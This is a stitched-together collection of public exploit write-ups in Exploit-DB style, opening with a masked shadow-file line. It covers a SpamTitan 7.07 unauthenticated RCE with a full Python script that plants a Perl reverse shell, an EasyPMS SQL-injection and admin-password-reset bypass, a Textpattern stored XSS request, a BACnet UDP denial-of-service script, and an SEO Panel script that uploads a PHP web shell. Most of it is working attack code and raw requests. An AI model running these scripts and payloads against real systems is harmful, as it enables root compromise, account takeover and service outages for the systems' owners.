root:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7::: admin:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7::: guest:xxxxxxxxxxxxxxxxxxxxxxxxxxxxx:11876:0:99999:7:::

# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution # Date: 2020-09-18 # Exploit Author: Felipe Molina (@felmoltor) # Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/ # Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway # Version: 7.07 # Tested on: FreeBSD # CVE : CVE-2020-11698 ---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php]------------------------------ SECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php Affected Software: SpamTitan Gateway 7.07 (possibly earlier versions) Vulnerability: Unauthenticated Remote Code Execution CVSSv3: 10.0 (https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Severity: Critical Release Date: 2020-04-17 CVE: CVE-2020-11698 I. Background ~~~~~~~~~~~~~ From www.spamtitan.com: "SpamTitan Gateway is a powerful Anti-Spam appliance that equips network administrators with extensive tools to control mail flow and protect against unwanted email and malware." II. Description ~~~~~~~~~~~~~~~ Improper input sanitization of the parameter "community" on the page snmp-x.php would allow a remote attacker to inject command directives into the file snmpd.conf. This would allow executing commands on the target server by by injecting an "extend" or "exec" SNMPD directive and querying the snmp daemon of the server for the correct OID. III. PoC ~~~~~~~~ Use python 3 and install the following modules: requests, pysnmp. If your IP is 192.168.1.5 and the target SpamTitan server is spamtitan.example.com, call the PoC like this: ./poc.py -t spamtitan.example.com -i 192.168.1.5 --------------------------------------------- #!/usr/bin/env python # Author: Felipe Molina (@felmoltor) # Date: 09/04/2020 # Python Version: 3.7 # Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan 7.07 and previous versions. # The script abuses of two weaknesses on the product: # 1. Unauthenticated interaction with snmp-x.php script # 2. Injection of snmpd.conf configuration directives in multiple POST parameters such as "community" or "user_username" of snmp-x.php # Product URL: https://www.spamtitan.com/ # Product Version: 7.07 and probably previous import requests requests.packages.urllib3.disable_warnings() import os import threading from optparse import OptionParser import socket import json from pysnmp.hlapi import * from urllib.parse import urlparse from time import sleep SNMPGETDELAY=5 def parseoptions(): parser = OptionParser() parser.add_option("-t", "--target", dest="target", help="Target SpamTitan URL to attack. E.g.: https://spamtitan.com/", default=None) parser.add_option("-i", "--ip", dest="ip", help="Local IP where to listen for the reverse shell. Default: %s" % myip(), default=myip()) parser.add_option("-p", "--port", dest="port", help="Local Port where to listen for the reverse shell. Default: 4242", default=4242) parser.add_option("-q", "--quiet", action="store_true", dest="quiet", default=False, help="Shut up script! Just give me the shell.") return parser.parse_args() def printmsg(msg,quiet=False,msgtype="i"): if (not quiet): if (success): print("[%s] %s" % (msgtype,msg)) else: print("[-] %s" % msg) def info(msg,quiet=False): printmsg(msg,quiet,msgtype="i") def success(msg,quiet=False): printmsg(msg,quiet,msgtype="+") def fail(msg,quiet=False): printmsg(msg,quiet,msgtype="-") def myip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't even have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except: IP = '127.0.0.1' finally: s.close() return IP def shellServer(ip,port,quiet): servers = socket.socket(socket.AF_INET, socket.SOCK_STREAM) servers.bind((ip, port)) servers.listen(1) info("Waiting for incoming connection on %s:%s" % (ip,port)) conn, addr = servers.accept() conn.settimeout(1) success("Hurray, we got a connection from %s" % addr[0]) prompt =conn.recv(128) prompt=str(prompt.decode("utf-8")).strip() command = input(prompt) while True: try: c = "%s\n" % (command) if (len(c)>0): conn.sendall(c.encode("utf-8")) # Quit the console if command == 'exit': info("\nClosing connection") conn.close() break else: completeanswer="" while True: answer=None try: answer=str((conn.recv(1024)).decode("utf-8")) completeanswer+=answer except socket.timeout: completeanswer.strip() break print(completeanswer,end='') command = input("") except (KeyboardInterrupt, EOFError): info("\nClosing connection") break def triggerSNMPShell(target, community, triggeroid, port, quiet): if (not quiet): print("Waiting %s seconds to allow the main thread set-up the shell listener." % SNMPGETDELAY) # Give the parent thread a few seconds to set up the shell listener before triggering the SNMP get query sleep(SNMPGETDELAY) if (not quiet): print("Querying the SNMP server to launch the shell.") targetp = urlparse(target) errorIndication, errorStatus, errorIndex, varBinds = next( getCmd(SnmpEngine(), CommunityData(community, mpModel=0), UdpTransportTarget((targetp.netloc, port)), ContextData(), ObjectType(ObjectIdentity(triggeroid))) ) if errorIndication: print("SNMP error: %s" % errorIndication) elif errorStatus: print('SNMP error status: %s at %s' % (errorStatus.prettyPrint(), errorIndex and varBinds[int(errorIndex) - 1][0] or '?')) def main(): (options,arguments) = parseoptions() q = options.quiet t = options.target i = options.ip p = options.port community="dummy" if (t is None): print("[-] Error. Specify a target (-t).") exit() if ((not "http://" in t) and (not "https://" in t)): t = "http://%s/snmp-x.php" % t else: t = "%s/snmp-x.php" % t if (not q): print("[+] Attacking: %s.\nReceiving shell in %s:%s" % (t,i,p)) TARGETOID=".1.3.6.1.4.1.8072.1.3.2.3.1.1.8.114.101.118.115.104.101.108.108" # PAYLOAD="extend revshell /usr/bin/perl -e 'use Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" % (i,p) PAYLOAD="extend revshell /usr/bin/perl -e 'use Socket;$i=\"%s\";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'" % (i,p) TOGGLESNMP={ "jaction":"toggleSNMP", "newval":"1" } INJECTION={ "jaction":"saveAll", "contact":"CONTACT", "name":"SpamTitan", "location":"LOCATION", # Add our IP as allowed to query the injected "dummy" community # Add also the perl payload in a new line (%0a) of the snmpd.conf file "community":'%s" %s\n%s # ' % (community,i,PAYLOAD) } rev_thread = threading.Thread(target=triggerSNMPShell, args=(t, community, TARGETOID, 161,q)) rev_thread.start() # Start a thread to listen for incoming reverse shells: if (not q): print("[+] Launching a reverse shell listener to wait for the shell.") # Send the SNMP request to add a community and append an "extend" command to execute scripts # SpamTitan would add a new line in the snmpd.conf file with the new community name and the "extend" script inj_res = requests.post(t,INJECTION,verify=False) if (inj_res.status_code == 200): if (not q): print("Spawning a reverse shell listener. Wait for it...") shellServer(options.ip,int(options.port),options.quiet) else: print("Error. The target is probably not vulnerable (returned a %s code)." % inj_res.status_code) main() --------------------------------------------- III. Impact ~~~~~~~~~~~ The snmpd daemon is running as root in the target server. The pressented PoC would return a root shell without need of any registered user in the target server. There is total loss of confidentiality, integrity and availability on the SpamTitan server. IV. Disclosure ~~~~~~~~~~~~~~ Reported By: Felipe Molina de la Torre Vendor Informed: 2020-04-17 Patch Release Date: 2020-05-26 Advisory Release Date: 2019-09-18 V. References ~~~~~~~~~~~~~ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11698 * https://sensepost.com/blog/2020/clash-of-the-spamtitan/ ---------------------------------[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in snmp-x.php]---

# Exploit Title: EasyPMS 1.0.0 - Authentication Bypass # Discovery by: Jok3r # Vendor Homepage: https://www.elektraweb.com/en/ # Software Link: https://github.com/Travelaps/EasyPMS/releases/ # Tested Version: 1.0.0 # Vulnerability Type: Authentication Bypass # Tested on OS: Windows Server 2012 #Description: EasyPMS has authentication bypass vulnerability that low privilege user can escalate privilege to HotelOwner admin privilege. Steps to Reproduce: 1) Unprivileged user can manipulate sql query within json request format. Admin user code can be obtained using single quote after ID column so that where clause is invalid. First Request: POST /Select/STDUSER HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://target/app/record/user-profile;index=$ANG.STDUSERID Content-Type: text/plain Content-Length: 689 Origin: https://target Connection: close {"Action":"Select","Object":"STDUSER","Select":["ID","USERCODE","PASSWORD","EMAIL","LASTNAME","GSM","PHONE","HOTELID","FIRSTNAME","PINCODE"],"Where":[{"Column":"ID'","Operator":"=","Value":"80403"},{"Column":"HOTELID","Operator":"=","Value":22330}],"Paging":{"Current":1,"ItemsPerPage":3},"LoginToken":"token_value"} 2) While user is sending password resetting request, can change password of Admin user that is inside HotelOwner privilege class. Because there is not validation of token and user has write permission on STDUSER table so admin user password can be changed by unprivileged user that obtains ID of admin user sending first request. Second Request: POST / HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://target/login Content-Type: text/plain Content-Length: 128 Origin: https://target Connection: close {"Row":{"PASSWORD":"Qw12344.","ID":"80401","HOTELID":22330},"SelectAfterUpdate":["ID"],"Action":"Update","Object":"STDUSER"} # Timeline: # 01.10.2020 - issue was discovered # 02.10.2020 - notify to vendor # 02.10.2020 - vendor fixed

# Exploit Title: Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting # Exploit Author: Alperen Ergel # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 # CVE :- ######## Description ######## # # 1-) Loggin administrator page # # 2-) Write new blog add payload to 'body' # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/textpattern/textpattern/index.php?event=article&ID=3 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------127132438115577379281797109093 Content-Length: 6080 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40; __atuvs=5f77129c504c17ce000 ### SNIPPP HERE #### -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="Title" XSS -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="textile_body" 1 -----------------------------127132438115577379281797109093 Content-Disposition: form-data; name="Body" <script>alert(1)</script> -----------------------------127132438115577379281797109093

# Title: BACnet Test Server 1.01 - Remote Denial of Service (PoC) # Date: 2020-10-07 # Author: LiquidWorm # Vendor: https://www.bac-test.com # Product link: https://sourceforge.com/projects/bacnetserver # CVE: N/A #!/usr/bin/perl # # BACnet Test Server 1.01 Remote Denial of Service Exploit # # # Vendor: BACnet Interoperability Test Services, Inc. # Product web page: https://www.bac-test.com # https://sourceforge.com/projects/bacnetserver # Affected version: 1.01 (BACnet Stack Version 0.5.7) # # Summary: This is a simple BACnet Server aimed at developers who # want to explore or test their BACnet Client implementations of # the ASHRAE BACnet protocol. It is based on Steve Karg's fine # implementation of the BACnet Stack. # # Desc: The BACNet Test Server is vulnerable to a denial of service # (DoS) vulnerability when sending malformed BVLC Length UDP packet # to port 47808 causing the application to crash. # # Type - 0x81 # BVLC Function # - 0x01 - Write Broadcast Distribution Table # - 0x02 - Read Broadcast Distribution Table # - 0x03 - Read Broadcast Distribution Table ACK # - 0x04 - Forwarded NPDU with optional Originating Device IP address and Port included in BVLL header # - 0x05 - Register Foreign Device with expiration timeout (Time-to-live) in seconds # - 0x0a - Original-Unicast-NPDU used to send directed NPDUs to another BACnet/IP device or router. # Optional Originating Device IP address and Port NOT included in BVLL header. # - 0x0b - Original-Broadcast-NPDU used by devices (except foreign devices) to broadcast messages on B/IP networks. # - 0x0c - Secure-BVLL # - BVLL Length # - IP address of Originating Device - optional depending on BVLC Function Code # - Port number of Originating Device - optional depending on BVLC Function Code # - NPDU - Network Layer Protocol Data Unit # # ================================================================= # (67c.2f34): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** WARNING: Unable to verify checksum for C:\Program Files (x86)\BACnet Interoperability Testing Services, Inc\BACnet Server\Server.exe # eax=00600000 ebx=00692000 ecx=009bd796 edx=005fee00 esi=005fec04 edi=005fed00 # eip=00994313 esp=005fec04 ebp=005fed00 iopl=0 nv up ei pl nz ac pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 # Server+0x34313: # 00994313 8810 mov byte ptr [eax],dl ds:002b:00600000=?? # 0:000> d 994313 +77 # 0099438a cccccccc # 0099438e cccccccc # 00994392 cccccccc # 00994396 cccccccc # 0099439a cccccccc # 0:000> d esp # 005fec04 005ff3f8 # 005fec08 005ff408 # 005fec0c 00692000 # 005fec10 cccccccc # 005fec14 cccccccc # 004fec18 cccccccc # ================================================================= # # Tested on: Microsoft Windows 10 Professional (EN) # Microsoft Windows 7 Professional SP1 (EN) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5597 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5597.php # # # 05.08.2019 # use strict; use warnings; use IO::Socket::INET; my $target = "10.0.99.34"; my $porta = 47808; my $proto = "udp"; my $stype = SOCK_DGRAM; my $timeout = 1; my $socket = new IO::Socket::INET ( PeerHost => $target, PeerPort => $porta, Proto => $proto, Type => $stype, Timeout => $timeout ) or die "Socket error. : $!\n"; print "Connected to: $target:$porta\n"; $| = 1; binmode $socket; my $data = "\x81\x09\xFF\xFE"; print "Sending: $data [ ".length($data)." bytes ]\n"; send ($socket, $data, 0) or die "Nope: $!\n"; print "Done.\n"; $socket->close();

# Exploit Title: SEO Panel 4.6.0 - Remote Code Execution # Google Dork: N/A # Date: 2020-10-03 # Exploit Author: Kiko Andreu (kikoas1995) & Daniel Monzón (stark0de) # Vendor Homepage: https://seopanel.org/ # Software Link: https://www.seopanel.org/spdownload/4.6.0 # Version: 4.6.0 # Tested on: Kali Linux x64 5.4.0 # CVE : N/A #!/usr/bin/python import sys import os import requests ip = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] port = sys.argv[4] proto = sys.argv[5] if (len(sys.argv) < 6): print "Usage: python " + sys.argv[0] + " <ip> + <webapp user> + <webapp pwd> + <webapp port> + <http/https>" exit() session = requests.session() # Get to login page burp0_url = proto + "://" + ip + ":" + port + "//login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} session.get(burp0_url, headers=burp0_headers, verify=False) # Login with the provided credentials burp0_url = proto + "://" + ip + ":" + port + "//login.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//login.php", "Content-Type": "application/x-www-form-urlencoded", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data = {"sec": "login", "red_referer": proto + "://" + ip + "/", "userName": user, "password": pwd, "login": ''} session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False) # Upload the webshell burp0_url = proto + "://" + ip + ":" + port + "//websites.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": proto + "://" + ip + "//admin-panel.php", "Content-Type": "multipart/form-data; boundary=---------------------------193626971803013289998688514", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data = "-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"sec\"\r\n\r\nimport\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"userid\"\r\n\r\n1\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"website_csv_file\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php system($_GET['c']); ?>\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"delimiter\"\r\n\r\n,\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"enclosure\"\r\n\r\n\"\r\n-----------------------------193626971803013289998688514\r\nContent-Disposition: form-data; name=\"escape\"\r\n\r\n\\\r\n-----------------------------193626971803013289998688514--\r\n" session.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False) exit = 0 first = 1 # Loop for remote code execution while (exit == 0): cmd = raw_input("> ") burp0_url = proto + "://" + ip + ":" + port + "//tmp/shell.php?c=" + cmd burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1"} x = session.get(burp0_url, headers=burp0_headers, verify=False) if (x.status_code == 200 and first == 1): first = 0 print "[+] Shell uploaded successfully!" print x.text if (cmd == "exit"): exit = 1